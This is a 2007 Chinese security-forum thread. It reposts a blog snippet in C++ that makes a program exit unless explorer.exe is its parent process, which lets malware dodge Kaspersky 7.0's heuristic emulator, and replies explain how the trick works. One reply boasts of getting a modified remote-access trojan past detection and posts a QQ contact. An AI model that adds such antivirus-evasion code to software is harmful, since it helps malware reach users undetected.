卡巴最新高级虚拟机启发式查毒技术被中国黑客攻破??

Redevil

11月9日，中国著名黑客xyzreg(著名的安全漏洞、安全软件研究者，曾在中国安全第一峰会 -- 安全焦点2007峰会上做新型恶意软件技术相关的议题演讲，演讲中演示了如何穿透卡巴斯基、诺顿、Mcafee等安全软件的主动防御体系等内容）在其BLOG上发表了一篇如何攻破卡巴斯基7.0的 “新型高级虚拟机启发式查毒技术”的文章，并提供了相应代码。
代码可以检测恶意程序自身是否在卡巴斯基7.0的虚拟机中运行，如果发现被卡巴斯基的虚拟机运行，则自动退出，从而使卡巴斯基无法发现程序中包含的恶意代码。

作者博客：
可怜的高级虚拟机启发式查毒

可怜的高级虚拟机启发式查毒 大 | 中 | 小 [ 2007/11/09 13:46 | by xyzreg ]
被我十几行代码就咔嚓了，而且还没用奇技淫巧，呵呵：

DWORD fpid,epid;

void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}

if (stricmp(pe.szExeFile,"explorer.exe")==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}

主函数里：
VMM();
if(fpid!=epid)
return 0;


不明白？那就不要看了，常识啊常识……

[ 本帖最后由 Redevil 于 2007-11-10 01:54 编辑 ]

cici584522

这也需要咔嚓技术/...我直接无壳状态下修改鸽子都可以穿越卡7启发式最高状态

现在关心的只有主动技术..查杀技术不放眼里

cici584522

对了版主..你不是要测试吗..加我QQ吧..我在本机已经测试了好几次了

Redevil

还要加你Q

cici584522

  又不麻烦....  QQ 104940507

pluto1313

进程不是explorer的子进程就退出。。。

呵呵，比较有意思

给大家解释一下：
卡巴的虚拟机技术会创建一个虚拟环境去运行被扫描的文件，当然文件必须是可执行的。上面的这段C++代码的意思就是：

病毒在自己的文件中加入以上代码初始化，病毒文件被启动后就会枚举自己的运行环境的进程，先获得自身的进程所属的父进程ID（PID），再获得进程中explorer.exe的ID，如果父进程ID和explorer.exe的ID不相同病毒文件则自动退出（也就自动从卡巴的虚拟机环境中退出，自然就不会有其他破坏的行为自然过了卡巴的启发）

为什么两个ID不同就退出呢？因为大部分我们自己运行的程序都是从属于explorer.exe的，是作为它的子进程启动的。卡巴虚拟机启动的文件不会是作为explorer.exe启动。
这段代码的本意就是本病毒如果不是被explorer.exe所启动的话，本程序就会自动结束！

——代码就是这个意思，至于是否有效另当别论。

[ 本帖最后由 pluto1313 于 2007-11-10 02:22 编辑 ]

一叶知秋

汗，所谓道高一尺魔高一丈，本来就没有很完美的杀软。

wangjay1980

是所有虚拟启发技术的弱点吗

king6808

不信

thomas007

就算你稍微几段代码就可以通过虚拟机。。。 咔吧也可以几段代码修复啊····没又必然的。。只有更好的